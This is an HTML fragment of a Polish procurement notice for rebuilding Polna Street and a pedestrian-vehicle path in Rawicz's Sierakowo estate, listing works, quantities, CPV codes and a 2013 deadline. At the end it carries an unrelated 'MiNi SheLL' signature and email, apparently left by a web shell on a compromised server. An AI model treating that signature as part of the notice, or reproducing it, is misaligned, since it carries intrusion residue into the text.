<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakres 2 Przebudowa ul. Polnej oraz ciągu pieszo-jezdnego na osiedlu Sierakowo w Rawiczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAKRES 2. Przebudowa ul. Polnej  oraz ciągu pieszo - jezdnego na odcinku  od ul. XXX lecia do ul. Tęczowej na osiedlu Sierakowo  w Rawiczu   obejmuje w szczególności : opracowanie dokumentacji projektowej wraz ze zgłoszeniem robót we właściwym organie budowlanym; roboty rozbiórkowe wraz z transportem materiału rozbiórkowego oraz uporządkowaniem terenu; frezowanie nawierzchni bitumicznej, ułożenie warstwy ścieralnej  oraz wyrównawczej  na pow.  780m2, ułożenie nawierzchni z kostki brukowej  na pow. 700 m2  w tym: ułożenie chodnika - 380m2,  zjazdów - 100m2, 
 ciągu pieszo - jezdnego - 220m2;  ułożenie ścieku ulicznego 320mb, krawężnika - 250 mb, obrzeża betonowego - 270 mb, opornika  - 30mb; budowa wpustów  ulicznych - 7 szt. wraz z przykanalikami o dł. 64 mb;  obsługa geodezyjna, organizacja ruchu i  oznakowanie;  inne prace towarzyszące wykonaniu zamówienia. Wymagania Zamawiającego w stosunku  do przedmiotu zamówienia, warunki techniczne, dane dotyczące konstrukcji nawierzchni  określają zapisy niniejszego rozdziału oraz zostały szczegółowo określone w programie funkcjonalno - użytkowym stanowiącym załącznik nr  7 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com